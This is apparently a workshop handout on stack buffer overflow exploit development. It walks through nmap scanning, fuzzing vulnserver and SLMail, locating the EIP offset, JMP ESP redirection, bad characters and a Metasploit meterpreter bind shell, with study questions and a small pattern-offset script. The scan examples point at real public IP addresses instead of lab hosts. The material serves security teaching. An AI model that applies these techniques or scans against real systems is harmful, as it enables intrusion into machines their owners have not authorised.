joemccray

Exploit Dev Process

May 1st, 2018
Skill Level 1: (Can identify vulnerable hosts - KNOWN VULNERABILITIES)
----------------------------------------------------------------------
- Ping Sweep
- Port Scan
- Bannergrab
- Vulnerability Research


########################
# Scanning Methodology #
########################

- Ping Sweep
What's alive?
------------

---------------------------Type This-----------------------------------
sudo nmap -sP 157.166.226.*

-----------------------------------------------------------------------


- If -sP yields no results, try:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.*

-----------------------------------------------------------------------


- Look for hostnames:
---------------------------Type This-----------------------------------
sudo nmap -sL 157.166.226.* | grep com

-----------------------------------------------------------------------


- Port Scan
What's where?
------------
---------------------------Type This-----------------------------------
sudo nmap -sS 162.243.126.247

-----------------------------------------------------------------------


- Bannergrab/Version Query
What versions of software are running?
-------------------------------------

---------------------------Type This-----------------------------------
sudo nmap -sV 162.243.126.247

-----------------------------------------------------------------------


- Vulnerability Research
Look up the banner versions for public exploits
----------------------------------------------
http://exploit-db.com
http://securityfocus.com/bid
https://packetstormsecurity.com/files/tags/exploit/



Skill Level 2: (Can identify UNKNOWN VULNERABILITIES)
----------------------------------------------------
1. App Type
- Stand Alone
- Client-Server (app name: vulnserver.exe)
- Web App

2. Data Input Type
- File/Keyboard/Mouse (Stand Alone)
- Logical Network Port (Client-Server) (tcp port: 9999)
- Browser (Web App)


3a. Map and fuzz all app entry points
- Methods
- Functions
- Subroutines
- Controllers
- Commands
HELP
STATS [stat_value]
RTIME [rtime_value]
LTIME [ltime_value]
SRUN [srun_value]
TRUN [trun_value]
GMON [gmon_value]
GDOG [gdog_value]
KSTET [kstet_value]
GTER [gter_value]
HTER [hter_value]
LTER [lter_value]
KSTAN [lstan_value]
EXIT

3b. Fuzz each app entry point


4. Isolate the crash
- TRUN 2100 is where the app crashes once placed in OllyDBG



5. Calculate distance to EIP
- Distance to EIP is 2006 bytes



6. Redirect program execution
- JMP REG (example: JMP ESP)
- PUSH REG; RET (example: PUSH ESP; RET)
- CALL REG (example: CALL ESP)
"\x91\xC8\x41\x7E" # CALL EDI - user32.dll
- Land in dummy shellcode


7. Replace dummy shellcode with real shellcode
- Bad characters
\x00\x0a\x2f\x5c
- Not enough space
243 bytes for shellcode




--------------------------------------------------------------------------------------------------------------------------------




###############################
# Intro to Exploit Development #
###############################
- You can download everything you need for this exercise (except netcat) from the link below:
https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip

- Extract this zip file to your Desktop

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe

- Open a new command prompt and type:
nc localhost 9999

- In the new command prompt window where you ran nc, type:
HELP

- Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
- Right-click on 1-simplefuzzer.py and choose the option "Edit with Notepad++"

- Now double-click on 1-simplefuzzer.py
- You'll notice that vulnserv.exe crashes. Be sure to note which command it crashed on and the number of As that were sent.


- Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note which command it crashed on and the number of As that were sent.

- Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe

- Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.

- Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).

- Now isolate the crash by restarting your debugger and running script 2-3000chars.py

- Calculate the distance to EIP by running script 3-3000chars.py
- This script sends 3000 nonrepeating chars to vulnserv.exe and populates EIP with the value 396F4338

4-count-chars-to-EIP.py
- In the previous script we saw that EIP was overwritten with 396F4338. Read as the bytes sit in memory (little-endian), that is 8 (38), C (43), o (6F), 9 (39).
- So we search for 8Co9 in the string of nonrepeating chars and count the distance to it
  183.  
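As an added example (not one of the lab's own scripts), here is the arithmetic behind step 5 of Skill Level 2 and 4-count-chars-to-EIP.py above: it builds a non-repeating pattern in the same scheme as Metasploit's pattern_create.rb, converts the debugger's EIP value 396F4338 into the bytes as they sit in memory, and finds their offset in the pattern, the way pattern_offset.rb does. The pattern scheme and the 3000-byte length are assumptions taken from the text, which does not say which tool produced the chars; with those assumptions the result is the page's 2006.

```python
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def cyclic_pattern(length: int) -> bytes:
    """Non-repeating pattern in the Metasploit pattern_create.rb scheme:
    'Aa0Aa1Aa2...Aa9Ab0Ab1...'. Every 4-byte window is unique within the
    first 26*26*10*3 = 20280 bytes, so a value pulled from a register
    maps back to exactly one offset. Truncated to the requested length."""
    out = bytearray()
    for u in UPPER:
        for lo in LOWER:
            for d in DIGITS:
                out += (u + lo + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the unique span of the pattern")


def eip_to_bytes(eip_hex: str) -> bytes:
    """The debugger shows EIP as a 32-bit number ('396F4338'). On x86 the
    four bytes that were copied from the buffer into the saved return
    address sit in memory little-endian, so reverse them: 38 43 6F 39."""
    return struct.pack("<I", int(eip_hex, 16))


def offset_to_eip(eip_hex: str, length: int = 3000) -> int:
    """Distance in bytes from the start of the sent buffer to the four
    bytes that landed in EIP (what pattern_offset.rb reports), or -1
    if the value did not come from the pattern at all."""
    return cyclic_pattern(length).find(eip_to_bytes(eip_hex))


if __name__ == "__main__":
    # Value from the page: 3000 nonrepeating chars, EIP = 396F4338
    print(eip_to_bytes("396F4338"))   # b'8Co9'
    print(offset_to_eip("396F4338"))  # 2006
```

A result of -1 means EIP was not overwritten by the pattern directly (for example the crash came from a different code path), which is worth confirming before trusting any distance.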
5-2006char-eip-check.py
- In this script we check whether our calculation of the distance to EIP is correct by overwriting EIP with 42424242

6-jmp-esp.py
- In this script we overwrite EIP with the address of a JMP ESP (6250AF11) inside of essfunc.dll

7-first-exploit
- In this script we actually do the stack overflow and launch a bind shell on port 4444

8 - Take a look at the file vulnserv.rb and place it on your Ubuntu host via SCP, or copy it and paste the code into the host.


------------------------------

cd ~/toolz/metasploit/modules/exploits/windows/misc

vi vulnserv.rb (paste the code into this file)



cd ~/toolz/metasploit

./msfconsole



use exploit/windows/misc/vulnserv
set PAYLOAD windows/meterpreter/bind_tcp
set RHOST 192.168.88.129
set RPORT 9999
exploit



-------------------------------------------------------------------------------------------------------------------------
The first exploit
https://s3.amazonaws.com/infosecaddictsfiles/SLmail5-5-Exploit.zip

SLMail Scripts Questions

SLmail1.py
How do you start SLMail?
What do you have to be careful of when attaching your debugger to the application?
How many As are you sending to the application?

SLmail2.py
What tool(s) can be used to generate a cyclic pattern?
What port are we attacking?
What verb are we attacking?

SLmail3.py
What is the value contained in EIP?
What is the portion of the cyclic pattern that we must search for?
What is the distance to EIP?

SLmail4.py
What do you overwrite EIP with in this script?
What is the length of your shellcode in this script?
What is the difference between SOCK_STREAM and SOCK_DGRAM?

SLmail5.py
What is struct.pack and why are we using it?
Where is our JMP ESP coming from?
What is the length of our shellcode in this script?

SLmail6.py
Why do you subtract the top of ESP from the bottom of ESP in this script?
What is the length of our shellcode in this script?
What is the distance to EIP in this script?


SLmail7.py
How do you test for bad characters?
What are the bad characters in this script?
What is the address of the JMP ESP in this script and what DLL does it come from?


SLmail8.py
What is DEP and how do you disable it?
What is the purpose of the stack adjustment?
What is the purpose of the NOP sled?


If you got through SLMail comfortably, then try the scripts below.
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip





-------------------------------------------------------------------------------------------------------------------------


Analysis of the exploit code:
https://www.exploit-db.com/exploits/15689/
What is the target platform that this exploit works against?
What is the variable name for the distance to EIP?
What is the actual distance to EIP in bytes?
Describe what is happening in the variable 'junk2'.

Analysis of the training walk-through based on EDB-ID 15689:
https://s3.amazonaws.com/infosecaddictsfiles/ff.zip

ff1.py
What does the sys module do?
What are sys.argv[1] and sys.argv[2]?
What application entry point is being attacked in this script?

ff2.py
Explain what is happening in lines 18 - 20.
What is pattern_create.rb doing and where can I find it?
Why can't I just double-click the file to run this script?

ff3.py
Explain what is happening in lines 17 to 25.
Explain what is happening in lines 30 to 32.
Why is everything below line 35 commented out?

ff4.py
Explain what is happening in lines 13 to 15.
Explain what is happening in line 19.
Why is everything below line 35 commented out?

ff5.py
Explain what is happening in line 15.
What is struct.pack?
How big is the shellcode in this script?

ff6.py
What is the distance to EIP?
How big is the shellcode in this script?
What is the total byte length of the data being sent to this app?

ff7.py
What is a tuple in Python? Unchangeable list
How big is the shellcode in this script? 1000 Bytes
Did your app crash from this script? No

ff8.py
How big is the shellcode in this script?
What is try/except in Python?
What is socket.SOCK_STREAM in Python?

ff9.py
What is going on in lines 19 and 20?
What is the length of the NOPs?
What is socket.SOCK_STREAM in Python?

ff010.py
What is going on in lines 18 - 20?
How would a stack adjustment help this script?